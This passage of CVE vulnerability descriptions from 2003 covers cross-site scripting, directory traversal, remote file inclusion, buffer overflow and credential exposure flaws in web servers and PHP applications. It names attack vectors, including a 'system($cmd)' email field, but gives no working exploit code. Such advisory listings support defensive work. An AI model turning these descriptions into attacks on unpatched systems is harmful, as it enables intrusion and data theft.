direct request to a user-specific configuration directory. [CVE-2003-1551] Unspecified vulnerability in Novell GroupWise 6 SP3 WebAccess before Revision F has unknown impact and attack vectors related to "malicious script." [CVE-2003-1549] Cross-site scripting (XSS) vulnerability in header.php in MyABraCaDaWeb 1.0.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the ma_kw parameter. [CVE-2003-1548] MyABraCaDaWeb 1.0.2 and earlier allows remote attackers to obtain sensitive information via an invalid IDAdmin or other parameter, which reveals the installation path in an error message. [CVE-2003-1547] Cross-site scripting (XSS) vulnerability in block-Forums.php in the Splatt Forum module for PHP-Nuke 6.x allows remote attackers to inject arbitrary web script or HTML via the subject parameter. [CVE-2003-1546] Cross-site scripting (XSS) vulnerability in gbook.php in Filebased guestbook 1.1.3 allows remote attackers to inject arbitrary web script or HTML via the comment section. [CVE-2003-1543] Cross-site scripting (XSS) vulnerability in Bajie Http Web Server 0.95zxe, 0.95zxc, and possibly others, allows remote attackers to inject arbitrary web script or HTML via the query string, which is reflected in an error message. [CVE-2003-1542] Directory traversal vulnerability in plugins/file.php in phpWebFileManager before 0.4.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the fm_path parameter. [CVE-2003-1541] PlanetMoon Guestbook tr3.a stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the admin script password, and other passwords, via a direct request to files/passwd.txt. [CVE-2003-1540] WF-Chat 1.0 Beta stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain authentication information via a direct request to (1) !pwds.txt and (2) !nicks.txt. [CVE-2003-1539] Cross-site scripting (XSS) vulnerability in ONEdotOH Simple File Manager (SFM) before 0.21 allows remote attackers to inject arbitrary web script or HTML via (1) file names and (2) directory names. [CVE-2003-1536] Multiple cross-site scripting (XSS) vulnerabilities in Codeworx Technologies DCP-Portal 5.3.1 allow remote attackers to inject arbitrary web script or HTML via (1) the q parameter to search.php and (2) the year parameter to calendar.php. [CVE-2003-1534] Cross-site scripting (XSS) vulnerability in jgb.php3 in Justice Guestbook 1.3 allows remote attackers to inject arbitrary web script or HTML via the (1) name, (2) homepage, (3) aim, (4) yim, (5) location, and (6) comment variables. [CVE-2003-1531] Cross-site scripting (XSS) vulnerability in testcgi.exe in Lilikoi Software Ceilidh 2.70 and earlier allows remote attackers to inject arbitrary web script or HTML via the query string. [CVE-2003-1522] Cross-site scripting (XSS) vulnerability in PSCS VPOP3 Web Mail server 2.0e and 2.0f allows remote attackers to inject arbitrary web script or HTML via the redirect parameter to the admin/index.html page. [CVE-2003-1519] Cross-site scripting (XSS) vulnerability in Vivisimo clustering engine allows remote attackers to inject arbitrary web script or HTML via the query parameter to the search program. [CVE-2003-1513] Multiple cross-site scripting (XSS) vulnerabilities in example scripts in Caucho Technology Resin 2.0 through 2.1.2 allow remote attackers to inject arbitrary web script or HTML via (1) env.jsp, (2) form.jsp, (3) session.jsp, (4) the move parameter to tictactoe.jsp, or the (5) name or (6) comment fields to guestbook.jsp. [CVE-2003-1511] Cross-site scripting (XSS) vulnerability in Bajie Java HTTP Server 0.95 through 0.95zxv4 allows remote attackers to inject arbitrary web script or HTML via (1) the query string to test.txt, (2) the guestName parameter to the custMsg servlet, or (3) the cookiename parameter to the CookieExample servlet. [CVE-2003-1510] TinyWeb 1.9 allows remote attackers to cause a denial of service (CPU consumption) via a ".%00." in an HTTP GET request to the cgi-bin directory. [CVE-2003-1509] Real Networks RealOne Enterprise Desktop 6.0.11.774, RealOne Player 2.0, and RealOne Player 6.0.11.818 through RealOne Player 6.0.11.853 allows remote attackers to execute arbitrary script in the local security zone by embeding script in a temp file before the temp file is executed by the default web browser. [CVE-2003-1505] Microsoft Internet Explorer 6.0 allows remote attackers to cause a denial of service (crash) by creating a web page or HTML e-mail with a textarea in a div element whose scrollbar-base-color is modified by a CSS style, which is then moved. [CVE-2003-1498] Cross-site scripting (XSS) vulnerability in search.php for WRENSOFT Zoom Search Engine 2.0 Build 1018 and earlier allows remote attackers to inject arbitrary web script or HTML via the zoom_query parameter. [CVE-2003-1495] Unspecified vulnerability in the non-SSL web agent in various HP Management Agent products allows local users or remote attackers to gain privileges or cause a denial of service via unknown attack vectors. [CVE-2003-1490] SonicWall Pro running firmware 6.4.0.1 allows remote attackers to cause a denial of service (device reset) via a long HTTP POST to the internal interface, possibly due to a buffer overflow. [CVE-2003-1486] Phorum 3.4 through 3.4.2 allows remote attackers to obtain the full path of the web server via an incorrect HTTP request to (1) smileys.php, (2) quick_listrss.php, (3) purge.php, (4) news.php, (5) memberlist.php, (6) forum_listrss.php, (7) forum_list_rdf.php, (8) forum_list.php, or (9) move.php, which leaks the information in an error message. [CVE-2003-1479] Cross-site scripting (XSS) vulnerability in webcamXP 1.02.432 and 1.02.535 allows remote attackers to inject arbitrary web script or HTML via the message field. [CVE-2003-1478] Konqueror in KDE 3.0.3 allows remote attackers to cause a denial of service (core dump) via a web page that begins with a "xFFxFE" byte sequence and a large number of CRLF sequences, as demonstrated using freeze.htm. [CVE-2003-1469] The default configuration of ColdFusion MX has the "Enable Robust Exception Information" option selected, which allows remote attackers to obtain the full path of the web server via a direct request to CFIDE/probe.cfm, which leaks the path in an error message. [CVE-2003-1468] The Web_Links module in PHP-Nuke 6.0 through 6.5 final allows remote attackers to obtain the full web server path via an invalid cid parameter that is non-numeric or null, which leaks the pathname in an error message. [CVE-2003-1467] Multiple cross-site scripting (XSS) vulnerabilities in (1) login.php, (2) register.php, (3) post.php, and (4) common.php in Phorum before 3.4.3 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2003-1463] Absolute path traversal vulnerability in Alt-N Technologies WebAdmin 2.0.0 through 2.0.2 allows remote attackers with administrator privileges to (1) determine the installation path by reading the contents of the Name parameter in a link, and (2) read arbitrary files via an absolute path in the Name parameter. [CVE-2003-1453] Cross-site scripting (XSS) vulnerability in the MytextSanitizer function in XOOPS 1.3.5 through 1.3.9 and XOOPS 2.0 through 2.0.1 allows remote attackers to inject arbitrary web script or HTML via a javascript: URL in an IMG tag. [CVE-2003-1447] IBM WebSphere Advanced Server Edition 4.0.4 uses a weak encryption algorithm (XOR and base64 encoding), which allows local users to decrypt passwords when the configuration file is exported to XML. [CVE-2003-1442] The web administration page for the Ericsson HM220dp ADSL modem does not require authentication, which could allow remote attackers to gain access from the LAN side. [CVE-2003-1438] Race condition in BEA WebLogic Server and Express 5.1 through 7.0.0.1, when using in-memory session replication or replicated stateful session beans, causes the same buffer to be provided to two users, which could allow one user to see session data that was intended for another user. [CVE-2003-1437] BEA WebLogic Express and WebLogic Server 7.0 and 7.0.0.1, stores passwords in plaintext when a keystore is used to store a private key or trust certificate authorities, which allows local users to gain access. [CVE-2003-1426] Openwebmail in cPanel 5.0, when run using suid Perl, adds the directory in the SCRIPT_FILENAME environment variable to Perl's @INC include array, which allows local users to execute arbitrary code by modifying SCRIPT_FILENAME to reference a directory containing a malicious openwebmail-shared.pl executable. [CVE-2003-1423] Petitforum stores the liste.txt data file under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as e-mail addresses and encrypted passwords. [CVE-2003-1420] Cross-site scripting (XSS) vulnerability in Opera 6.0 through 7.0 with automatic redirection disabled allows remote attackers to inject arbitrary web script or HTML via the HTTP Location header. [CVE-2003-1419] Netscape 7.0 allows remote attackers to cause a denial of service (crash) via a web page with an invalid regular expression argument to the JavaScript reformatDate function. [CVE-2003-1404] DotBr 0.1 stores config.inc with insufficient access control under the web document root, which allows remote attackers to obtain sensitive information such as SQL usernames and passwords. [CVE-2003-1401] login.php in php-Board 1.0 stores plaintext passwords in $username.txt with insufficient access control under the web document root, which allows remote attackers to obtain sensitive information via a direct request. [CVE-2003-1400] Cross-site scripting (XSS) vulnerability in the Your_Account module for PHP-Nuke 5.0 through 6.0 allows remote attackers to inject arbitrary web script or HTML via the user_avatar parameter. [CVE-2003-1394] CoffeeCup Software Password Wizard 4.0 stores sensitive information such as usernames and passwords in a .apw file under the web document root with insufficient access control, which allows remote attackers to obtain that information via a direct request for the file. [CVE-2003-1385] ipchat.php in Invision Power Board 1.1.1 allows remote attackers to execute arbitrary PHP code, if register_globals is enabled, by modifying the root_path parameter to reference a URL on a remote web server that contains the code. [CVE-2003-1384] Cross-site scripting (XSS) vulnerability in index.php in PY-Livredor 1.0 allows remote attackers to insert arbitrary web script or HTML via the (1) titre, (2) Votre pseudo, (3) Votre e-mail, or (4) Votre message fields. [CVE-2003-1383] WEB-ERP 0.1.4 and earlier allows remote attackers to obtain sensitive information via an HTTP request for the logicworks.ini file, which contains the MySQL database username and password. [CVE-2003-1372] Cross-site scripting (XSS) vulnerability in links.php script in myPHPNuke 1.8.8, and possibly earlier versions, allows remote attackers to inject arbitrary HTML and web script via the (1) ratenum or (2) query parameters. [CVE-2003-1370] Multiple cross-site scripting (XSS) vulnerabilities in Nuked-Klan 1.2b allow remote attackers to inject arbitrary HTML or web script via (1) the Author field in the Guestbook module, (2) the Titre or Pseudo fields in the Forum module, or (3) "La Tribune Libre" in the Shoutbox module. [CVE-2003-1364] Aprelium Technologies Abyss Web Server 1.1.2, and possibly other versions before 1.1.4, allows remote attackers to cause a denial of service (crash) via an HTTP GET message with empty (1) Connection or (2) Range fields. [CVE-2003-1353] Multiple cross-site scripting (XSS) vulnerabilities in Outreach Project Tool (OPT) 0.946b allow remote attackers to inject arbitrary web script or HTML, as demonstrated using the news field. [CVE-2003-1348] Cross-site scripting (XSS) vulnerability in guestbook.cgi in ftls.org Guestbook 1.1 allows remote attackers to inject arbitrary web script or HTML via the (1) comment, (2) name, or (3) title field. [CVE-2003-1347] Multiple cross-site scripting (XSS) vulnerabilities in Geeklog 1.3.7 allow remote attackers to inject arbitrary web script or HTML via the (1) cid parameter to comment.php, (2) uid parameter to profiles.php, (3) uid to users.php, and (4) homepage field. [CVE-2003-1345] Directory traversal vulnerability in s.dll in WebCollection Plus 5.00 allows remote attackers to view arbitrary files in c:\ via a full pathname in the d parameter. [CVE-2003-1341] The default installation of Trend Micro OfficeScan 3.0 through 3.54 and 5.x allows remote attackers to bypass authentication from cgiChkMasterPasswd.exe and gain access to the web management console via a direct request to cgiMasterPwd.exe. [CVE-2003-1338] CRLF injection vulnerability in Aprelium Abyss Web Server 1.1.2 and earlier allows remote attackers to inject arbitrary HTTP headers and possibly conduct HTTP Response Splitting attacks via CRLF sequences in the Location header. [CVE-2003-1337] Heap-based buffer overflow in Aprelium Abyss Web Server 1.1.2 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request. [CVE-2003-1334] Cross-site scripting (XSS) vulnerability in Kai Blankenhorn Bitfolge simple and nice index file (aka snif) before 1.2.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2003-1318] Twilight Webserver 1.3.3.0 allows remote attackers to cause a denial of service (application crash) via a GET request for a long URI, a different vulnerability than CVE-2004-2376. [CVE-2003-1317] Cross-site scripting (XSS) vulnerability in mod.php in eNdonesia 8.2 allows remote attackers to inject arbitrary web script or HTML via the mod parameter. NOTE: The provenance of this information is unknown [CVE-2003-1311] siteminderagent/SmMakeCookie.ccc in Netegrity SiteMinder does not ensure that the TARGET parameter names a valid redirection resource, which allows remote attackers to construct a URL that might trick users into visiting an arbitrary web site referenced by this parameter. [CVE-2003-1305] Microsoft Internet Explorer allows remote attackers to cause a denial of service (resource consumption) via a Javascript src attribute that recursively loads the current web page. [CVE-2003-1304] EarlyImpact ProductCart 1.0 through 2.0 stores database/EIPC.mdb under the web root with insufficient access control, which allows remote attackers to obtain sensitive database information via a direct request. [CVE-2003-1301] Sun Java Runtime Environment (JRE) 1.x before 1.4.2_11 and 1.5.x before 1.5.0_06, and as used in multiple web browsers, allows remote attackers to cause a denial of service (application crash) via deeply nested object arrays, which are not properly handled by the garbage collector and trigger invalid memory accesses. [CVE-2003-1297] Easy File Sharing (EFS) Web Server 1.2 stores the (1) option.ini (aka options.ini) file and (2) log directory under the web root with insufficient access control, which allows remote attackers to obtain sensitive information including an SMTP account username and password hash, the server configuration, and server log files. [CVE-2003-1296] Easy File Sharing (EFS) Web Server 1.2 allows remote authenticated users to cause a denial of service via (1) an "empty symbol" in the Title field or (2) certain data in the Your Message field, possibly a long argument. [CVE-2003-1294] Xscreensaver before 4.15 creates temporary files insecurely in (1) driver/passwd-kerberos.c, (2) driver/xscreensaver-getimage-video, (3) driver/xscreensaver.kss.in, and the (4) vidwhacker and (5) webcollage screensavers, which allows local users to overwrite arbitrary files via a symlink attack. [CVE-2003-1293] Multiple cross-site scripting (XSS) vulnerabilities in NukedWeb GuestBookHost allow remote attackers to inject arbitrary web script or HTML via the (1) Name, (2) Email and (3) Message fields when signing the guestbook. [CVE-2003-1285] Multiple cross-site scripting (XSS) vulnerabilities in Sambar Server before 6.0 beta 6 allow remote attackers to inject arbitrary web script or HTML via the query string to (1) isapi/testisa.dll, (2) testcgi.exe, (3) environ.pl, (4) the query parameter to samples/search.dll, (5) the price parameter to mortgage.pl, (6) the query string in dumpenv.pl, (7) the query string to dumpenv.pl, and (8) the E-Mail field of the guestbook script (book.pl). [CVE-2003-1282] IBM Net.Data allows remote attackers to obtain sensitive information such as path names, server names and possibly user names and passwords by causing the (1) $(DTW_CURRENT_FILENAME), (2) $(DATABASE), (3) $(LOGIN), (4) $(PASSWORD), and possibly other predefined variables that can be echoed back to the user via a web form. [CVE-2003-1271] Cross-site scripting vulnerability (XSS) in AN HTTP 1.41e allows remote attackers to execute arbitrary web script or HTML as other users via a URL containing the script. [CVE-2003-1269] AN HTTP 1.41e allows remote attackers to obtain the root web server path via an HTTP request with a long argument to a script, which leaks the path in an error message. [CVE-2003-1258] activate.php in versatileBulletinBoard (vBB) 0.9.5 and 0.9.6 allows remote attackers to gain unauthorized administrative access via a URL request with the uid parameter set to the webmaster uid. [CVE-2003-1256] aff_liste_langue.php in E-theni allows remote attackers to execute arbitrary PHP code by modifying the rep_include parameter to reference a URL on a remote web server that contains para_langue.php. [CVE-2003-1254] Active PHP Bookmarks (APB) 1.1.01 allows remote attackers to execute arbitrary PHP code via (1) head.php, (2) apb_common.php, or (3) apb_view_class.php by modifying the APB_SETTINGS parameter to reference a URL on a remote web server that contains the code. [CVE-2003-1252] register.php in S8Forum 3.0 allows remote attackers to execute arbitrary PHP commands by creating a user whose name ends in a .php extension and entering the desired commands into the E-mail field, which creates a web-accessible .php file that can be called by the attacker, as demonstrated using a "system($cmd)" E-mail address with a "any_name.php" username. [CVE-2003-1251] The (1) menu.inc.php, (2) datasets.php and (3) mass_operations.inc.php (mistakenly referred to as mass_opeations.inc.php) scripts in N/X 2002 allow remote attackers to execute arbitrary PHP code via a c_path that references a URL on a remote web server that contains the code. [CVE-2003-1250] Efficient Networks 5861 DSL router, when running firmware 5.3.80 configured to block incoming TCP SYN, packets allows remote attackers to cause a denial of service (crash) via a flood of TCP SYN packets to the WAN interface using a port scanner such as nmap. [CVE-2003-1249] WebIntelligence 2.7.1 uses guessable user session cookies, which allows remote attackers to hijack sessions. [CVE-2003-1248] H-Sphere WebShell 2.3 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) mode and (2) zipfile parameters in a URL request. [CVE-2003-1247] Multiple buffer overflows in H-Sphere WebShell 2.3 allow remote attackers to execute arbitrary code via (1) a long URL content type in CGI::readFile, (2) a long path in diskusage, and (3) a long fname in flist. [CVE-2003-1243] Cross-site scripting vulnerability (XSS) in Sage 1.0 b3 allows remote attackers to insert arbitrary HTML or web script via the mod parameter. [CVE-2003-1242] Sage 1.0 b3 allows remote attackers to obtain the root web server path via a URL request for a non-existent module, which returns the path in an error message. [CVE-2003-1241] Cross-site scripting vulnerability (XSS) in (1) admin_index.php, (2) admin_pass.php, (3) admin_modif.php, and (4) admin_suppr.php in MyGuestbook 3.0 allows remote attackers to execute arbitrary PHP code by modifying the location parameter to reference a URL on a remote web server that contains file.php via script injected into the pseudo, email, and message parameters. [CVE-2003-1237] Cross-site scripting vulnerability (XSS) in WWWBoard 2.0A2.1 and earlier allows remote attackers to inject arbitrary HTML or web script via a message post. [CVE-2003-1235] BRW WebWeaver 1.03 allows remote attackers to obtain sensitive server environment information via a URL request for testcgi.exe, which lists the values of environment variables and the current working directory. [CVE-2003-1231] Cross-site scripting (XSS) vulnerability in index.php in ECW-Shop 5.5 allows remote attackers to inject arbitrary web script or HTML via the cat parameter. [CVE-2003-1229] X509TrustManager in (1) Java Secure Socket Extension (JSSE) in SDK and JRE 1.4.0 through 1.4.0_01, (2) JSSE before 1.0.3, (3) Java Plug-in SDK and JRE 1.3.0 through 1.4.1, and (4) Java Web Start 1.0 through 1.2 incorrectly calls the isClientTrusted method when determining server trust, which results in improper validation of digital certificate and allows remote attackers to (1) falsely authenticate peers for SSL or (2) incorrectly validate signed JAR files. [CVE-2003-1226] BEA WebLogic Server and Express 7.0 and 7.0.0.1 stores certain secrets concerning password encryption insecurely in config.xml, filerealm.properties, and weblogic-rar.xml, which allows local users to learn those secrets and decrypt passwords. [CVE-2003-1225] The default CredentialMapper for BEA WebLogic Server and Express 7.0 and 7.0.0.1 stores passwords in cleartext on disk, which allows local users to extract passwords. [CVE-2003-1224] Weblogic.admin for BEA WebLogic Server and Express 7.0 and 7.0.0.1 displays the JDBCConnectionPoolRuntimeMBean password to the screen in cleartext, which allows attackers to read a user's password by physically observing ("shoulder surfing") the screen. [CVE-2003-1223] The Node Manager for BEA WebLogic Express and Server 6.1 through 8.1 SP 1 allows remote attackers to cause a denial of service (Node Manager crash) via malformed data to the Node Manager's port, as demonstrated by nmap. [CVE-2003-1222] BEA Weblogic Express and Server 8.0 through 8.1 SP 1, when using a foreign Java Message Service (JMS) provider, echoes the password for the foreign provider to the console and stores it in cleartext in config.xml, which could allow attackers to obtain the password. [CVE-2003-1221] BEA WebLogic Express and Server 7.0 through 8.1 SP 1, under certain circumstances when a request to use T3 over SSL (t3s) is made to the insecure T3 port, may use a non-SSL connection for the communication, which could allow attackers to sniff sessions. [CVE-2003-1220] BEA WebLogic Server proxy plugin for BEA Weblogic Express and Server 6.1 through 8.1 SP 1 allows remote attackers to cause a denial of service (proxy plugin crash) via a malformed URL. [CVE-2003-1219] Cross-site scripting (XSS) vulnerability in the tep_href_link function in html_output.php for osCommerce before 2.2-MS3 allows remote attackers to inject arbitrary web script or HTML via the osCsid parameter. [CVE-2003-1213] The default installation of MaxWebPortal 1.30 stores the portal database under the web document root with insecure access control, which allows remote attackers to obtain sensitive information via a direct request to database/db2000.mdb. [CVE-2003-1212] MaxWebPortal 1.30 allows remote attackers to perform unauthorized actions by modifying hidden form fields, such as the (1) news, (2) lock, or (3) allmem fields in the 'start new topic' HTML page. [CVE-2003-1211] Cross-site scripting (XSS) vulnerability in search.asp for MaxWebPortal 1.30 and possibly earlier versions allows remote attackers to inject arbitrary web script or HTML via the Search parameter. [CVE-2003-1202] The checklogin function in omail.pl for omail webmail 0.98.4 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in a (1) password, (2) domainname, or (3) username. [CVE-2003-1199] Cross-site scripting (XSS) vulnerability in MyProxy 20030629 allows remote attackers to inject arbitrary web script or HTML via the URL. [CVE-2003-1198] connection.c in Cherokee web server before 0.4.6 allows remote attackers to cause a denial of service via an HTTP POST request without a Content-Length header field. [CVE-2003-1197] Cross-site scripting (XSS) vulnerability in index.php for Ledscripts.com LedForums Beta 1 allows remote attackers to inject arbitrary web script or HTML via the (1) top_message parameter or (2) topic field of a new thread. [CVE-2003-1194] Cross-site scripting (XSS) vulnerability in Booby .1 through 0.2.3 allows remote attackers to inject arbitrary web script or HTML via the error message. [CVE-2003-1192] Stack-based buffer overflow in IA WebMail Server 3.1.0 allows remote attackers to execute arbitrary code via a long GET request. [CVE-2003-1190] Cross-site scripting (XSS) vulnerability in PHPRecipeBook 1.24 through 2.17 allows remote attackers to inject arbitrary web script or HTML via a recipe. [CVE-2003-1187] Cross-site scripting (XSS) vulnerability in include.php in PHPKIT 1.6.02 and 1.6.03 allows remote attackers to inject arbitrary web script or HTML via the contact_email parameter. [CVE-2003-1186] Buffer overflow in TelCondex SimpleWebServer 2.12.30210 Build3285 allows remote attackers to execute arbitrary code via a long HTTP Referer header. [CVE-2003-1184] Multiple cross-site scripting (XSS) vulnerabilities in ThWboard Beta 2.8 and 2.81 allow remote attackers to inject arbitrary web script or HTML via (1) time in board.php, (2) the profile Homepage-Feld, (3) pictures, and (4) other "Diverse XSS Bugs." [CVE-2003-1183] The WebCache component in Oracle Files 9.0.3.1.0, 9.0.3.2.0, and 9.0.3.3.0 of Oracle Collaboration Suite Release 1 caches files despite the cacheability rules imposed by Oracle Files, which allows local users to gain access. [CVE-2003-1182] Cross-site scripting (XSS) vulnerability in MPM Guestbook 1.2 allows remote attackers to inject arbitrary web script or HTML via the lng parameter. [CVE-2003-1176] post_message_form.asp in Web Wiz Forums 6.34 through 7.5, when quote mode is used, allows remote attackers to read or write to private forums by modifying the FID (forum ID) parameter. [CVE-2003-1175] Cross-site scripting (XSS) vulnerability in index.php in Sympoll 1.5 allows remote attackers to inject arbitrary web script or HTML via the vo parameter. [CVE-2003-1165] Buffer overflow in BRS WebWeaver 1.06 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via an HTTP request with a long User-Agent header. [CVE-2003-1164] Cross-site scripting (XSS) vulnerability in Mldonkey 2.5-4 allows remote attackers to inject arbitrary web script or HTML via the URI, which is injected into the HTML error page. [CVE-2003-1159] Plug and Play Web Server Proxy 1.0002c allows remote attackers to cause a denial of service (server crash) via an invalid URI in an HTTP GET request to TCP port 8080. [CVE-2003-1158] Multiple buffer overflows in the FTP service in Plug and Play Web Server 1.0002c allow remote attackers to cause a denial of service (crash) via long (1) dir, (2) ls, (3) delete, (4) mkdir, (5) DELE, (6) RMD, or (7) MKD commands. [CVE-2003-1157] Cross-site scripting (XSS) vulnerability in login.asp in Citrix MetaFrame XP Server 1.0 allows remote attackers to inject arbitrary web script or HTML via the NFuse_Message parameter. [CVE-2003-1152] WebTide 7.04 allows remote attackers to list arbitrary directories via an HTTP request for %3f.jsp (encoded "?"). [CVE-2003-1151] Cross-site scripting (XSS) vulnerability in Fastream NETFile Server 6.0.3.588 allows remote attackers to inject arbitrary web script or HTML via the URL, which is displayed on a "404 Not Found" error page. [CVE-2003-1149] Cross-site scripting (XSS) vulnerability in Symantec Norton Internet Security 2003 6.0.4.34 allows remote attackers to inject arbitrary web script or HTML via a URL to a blocked site, which is displayed on the blocked sites error page. [CVE-2003-1146] Cross-site scripting (XSS) vulnerability in John Beatty Easy PHP Photo Album 1.0 allows remote attackers to inject arbitrary web script or HTML via the dir parameter. [CVE-2003-1145] Cross-site scripting (XSS) vulnerability in friendmail.php in OpenAutoClassifieds 1.0 allows remote attackers to inject arbitrary web script or HTML via the listing parameter. [CVE-2003-1144] Buffer overflow in the log viewing interface in Perception LiteServe 1.25 through 2.2 allows remote attackers to execute arbitrary code via a GET request with a long file name. [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//). [CVE-2003-1136] Cross-site scripting (XSS) vulnerability in Chi Kien Uong Guestbook 1.51 allows remote attackers to inject arbitrary web script or HTML via (1) HTML in a posted message or (2) Javascript in an onmouseover attribute in an e-mail address or URL. [CVE-2003-1131] PHP remote file inclusion vulnerability in index.php in KnowledgeBuilder, referred to as KnowledgeBase, allows remote attackers to execute arbitrary PHP code by modifying the page parameter to reference a URL on a remote web server that contains the code. [CVE-2003-1126] Unknown vulnerability in SunOne/iPlanet Web Server SP3 through SP5 on Windows platforms allows remote attackers to cause a denial of service. [CVE-2003-1101] Hummingbird CyberDOCS 3.5.1, 3.9, and 4.0 allows remote attackers to obtain the full path of the DM Web Server via invalid login credentials, which reveals the path in an error message. [CVE-2003-1100] Multiple cross-site scripting (XSS) vulnerabilities in Hummingbird CyberDOCS 3.5.1, 3.9, and 4.0 allow remote attackers to inject arbitrary web script or HTML via certain vectors. [CVE-2003-1095] BEA WebLogic Server and Express 7.0 and 7.0.0.1, when using "memory" session persistence for web applications, does not clear authentication information when a web application is redeployed, which could allow users of that application to gain access without having to re-authenticate. [CVE-2003-1094] BEA WebLogic Server and Express version 7.0 SP3 may follow certain code execution paths that result in an incorrect current user, such as in the frequent use of JNDI initial contexts, which could allow remote authenticated users to gain privileges. [CVE-2003-1093] BEA WebLogic Server 6.1, 7.0 and 7.0.0.1, when routing messages to a JMS target domain that is inaccessible, may leak the user's password when it throws a ResourceAllocationException. [CVE-2003-1089] index.php for Zorum 3.4 allows remote attackers to determine the full path of the web root via invalid parameter names, which reveals the path in a PHP error message. [CVE-2003-1088] Cross-site scripting (XSS) vulnerability in index.php for Zorum 3.4 and 3.5 allows remote attackers to inject arbitrary web script or HTML via the method parameter. [CVE-2003-1086] PHP remote file inclusion vulnerability in pm/lib.inc.php in pMachine Free and pMachine Pro 2.2 and 2.2.1 allows remote attackers to execute arbitrary PHP code by modifying the pm_path parameter to reference a URL on a remote web server that contains the code. [CVE-2003-1039] Multiple buffer overflows in the mySAP.com architecture for SAP allow remote attackers to execute arbitrary code via a long HTTP Host header to (1) Message Server, (2) Web Dispatcher, or (3) Application Server. [CVE-2003-1032] Pi3Web web server 2.0.2 Beta 1, when the Directory Index is configured to use the "Name" column and sort using the column title as a hyperlink, allows remote attackers to cause a denial of service (crash) via a malformed URL to the web server, possibly involving a buffer overflow. [CVE-2003-1031] Cross-site scripting (XSS) vulnerability in register.php for vBulletin 3.0 Beta 2 allows remote attackers to inject arbitrary HTML or web script via optional fields such as (1) "Interests-Hobbies", (2) "Biography", or (3) "Occupation." [CVE-2003-1017] Macromedia Flash Player before 7,0,19,0 stores a Flash data file in a predictable location that is accessible to web browsers such as Internet Explorer and Opera, which allows remote attackers to read restricted files via vulnerabilities in web browsers whose exploits rely on predictable names. [CVE-2003-1004] Cisco PIX firewall 6.2.x through 6.2.3, when configured as a VPN Client, allows remote attackers to cause a denial of service (dropped IPSec tunnel connection) via an IKE Phase I negotiation request to the outside interface of the firewall. [CVE-2003-0996] Unknown "System Security Vulnerability" in Computer Associates (CA) Unicenter Remote Control (URC) 6.0 allows attackers to gain privileges via the help interface. [CVE-2003-0980] Cross-site scripting (XSS) vulnerability in FreeScripts VisitorBook LE (visitorbook.pl) allows remote attackers to inject arbitrary HTML or web script via (1) the "do" parameter, (2) via the "user" parameter from a host with a malicious reverse DNS name, (3) via quote marks or ampersands in other parameters. [CVE-2003-0978] Format string vulnerability in gpgkeys_hkp (experimental HKP interface) for the GnuPG (gpg) client 1.2.3 and earlier, and 1.3.3 and earlier, allows remote attackers or a malicious keyserver to cause a denial of service (crash) and possibly execute arbitrary code during key retrieval. [CVE-2003-0945] The Web Database Manager in web-tools for SAP DB before 7.4.03.30 generates predictable session IDs, which allows remote attackers to conduct unauthorized activities. [CVE-2003-0944] Buffer overflow in the WAECHO default service in web-tools in SAP DB before 7.4.03.30 allows remote attackers to execute arbitrary code via a URL with a long requestURI. [CVE-2003-0942] Buffer overflow in Web Agent Administration service in web-tools for SAP DB before 7.4.03.30 allows remote attackers to execute arbitrary code via a long Name parameter to waadmin.wa. [CVE-2003-0941] web-tools in SAP DB before 7.4.03.30 allows remote attackers to access the Web Agent Administration pages and modify configuration via a direct request to waadmin.wa. [CVE-2003-0940] Directory traversal vulnerability in sqlfopenc for web-tools in SAP DB before 7.4.03.30 allows remote attackers to read arbitrary files via .. (dot dot) sequences in a URL. [CVE-2003-0936] Symantec PCAnywhere 10.x and 11, when started as a service, allows attackers to gain SYSTEM privileges via the help interface using AWHOST32.exe. [CVE-2003-0910] The NtSetLdtEntries function in the programming interface for the Local Descriptor Table (LDT) in Windows NT 4.0 and Windows 2000 allows local attackers to gain access to kernel memory and execute arbitrary code via an expand-down data segment descriptor descriptor that points to protected memory. [CVE-2003-0904] Microsoft Exchange 2003 and Outlook Web Access (OWA), when configured to use NTLM authentication, does not properly reuse HTTP connections, which can cause OWA users to view mailboxes of other users when Kerberos has been disabled as an authentication method for IIS 6.0, e.g. when SharePoint Services 2.0 is installed. [CVE-2003-0859] The getifaddrs function in GNU libc (glibc) 2.2.4 and earlier allows local users to cause a denial of service by sending spoofed messages as other users to the kernel netlink interface. [CVE-2003-0858] Zebra 0.93b and earlier, and quagga before 0.95, allows local users to cause a denial of service by sending spoofed messages as other users to the kernel netlink interface. [CVE-2003-0857] The (1) ipq_read and (2) ipulog_read functions in iptables allow local users to cause a denial of service by sending spoofed messages as other users to the kernel netlink interface. [CVE-2003-0856] iproute 2.4.7 and earlier allows local users to cause a denial of service via spoofed messages as other users to the kernel netlink interface. [CVE-2003-0841] The grid option in PeopleSoft 8.42 stores temporary .xls files in guessable directories under the web document root, which allows remote attackers to steal search results by directly accessing the files via a URL request. [CVE-2003-0833] Stack-based buffer overflow in webfs before 1.20 allows attackers to execute arbitrary code by creating directories that result in a long pathname. [CVE-2003-0832] Directory traversal vulnerability in webfs before 1.20 allows remote attackers to read arbitrary files via .. (dot dot) sequences in a Hostname header. [CVE-2003-0809] Internet Explorer 5.01 through 6.0 does not properly handle object tags returned from a Web server during XML data binding, which allows remote attackers to execute arbitrary code via an HTML e-mail message or web page. [CVE-2003-0802] Nokia Electronic Documentation (NED) 5.0 allows remote attackers to obtain a directory listing of the WebLogic web root, and the physical path of the NED server, via a "retrieve" action with a location parameter of . (dot). [CVE-2003-0801] Cross-site scripting (XSS) vulnerability in Nokia Electronic Documentation (NED) 5.0 allows remote attackers to execute arbitrary web script and steal cookies via a URL to the docs/ directory that contains the script. [CVE-2003-0785] ipmasq before 3.5.12, in certain configurations, may forward packets to the external interface even if the packets are not associated with an established connection, which could allow remote attackers to bypass intended filtering. [CVE-2003-0769] Cross-site 